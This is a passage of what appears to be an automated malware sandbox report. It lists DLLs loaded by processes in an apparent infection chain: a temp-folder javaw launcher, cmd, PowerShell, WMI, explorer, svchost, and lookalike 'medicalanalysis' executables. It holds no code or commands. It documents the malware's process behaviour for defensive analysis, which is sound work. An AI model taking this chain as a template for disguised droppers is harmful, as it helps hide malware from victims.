                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: d3d9.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: d3d10warp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: dxcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: dataexchange.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: dcomp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ninput.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: actxprxy.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ninput.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: smartscreenps.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: pcacli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeSection loaded: feclient.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\medicalanalysispro\medicalanalysispro.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: powrprof.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: umpdc.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: msisip.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: wshext.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: appxsip.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: opcservices.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: esdsip.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: ncryptprov.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: cryptui.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: textinputframework.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: coreuicomponents.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: coremessaging.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: coremessaging.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicallanalysis.exeSection loaded: wintypes.dll
